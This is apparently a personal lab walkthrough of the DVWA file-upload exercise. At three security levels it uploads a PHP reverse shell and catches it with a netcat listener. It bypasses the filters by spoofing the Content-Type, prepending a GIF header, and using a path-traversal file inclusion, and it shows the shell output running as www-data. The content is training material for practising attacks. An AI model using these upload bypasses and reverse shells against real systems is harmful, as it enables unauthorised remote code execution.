Security level: low
Create PHP reverse shell file rev.php
.
Refference: https://www.revshells.com/
Listing IP: 192.168.170.131
port: 9001
netcat listener command: nc -lvnp 9001
upload the file rev.php
and visit the url : http://192.168.170.131/hackable/uploads/rev.php
and you have reverse shell:
Output:
┌─[✗]─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.170.131] from (UNKNOWN) [172.17.0.2] 54022
SOCKET: Shell has connected! PID: 331
whoami
www-data
uname
Linux
Security level: medium
This time it is blocking php file we can bypass that by changing:
Content-Type: application/x-php
==> Content-Type: image/png
we can also do that from browser go to inspect element ,Network tab resubmit the request so it show up on network tab select that upload request right click and Edit and Resend:
make changes and hit send button,visit the url and you have reverse shell.
Security level: high
Changing Content-Type is not working maybe server is verifying the file header signature.
add GIF98;
at the start of our exploit file and rename it with rev.php.png
.
but whene we visit it directly it is not working so we use file inclusion:
url: http://192.168.170.131/vulnerabilities/fi/?page=file/../../../hackable/uploads/rev.php.png
<- security high
and we have reverse shell on our netcat listener.
Happy Hacking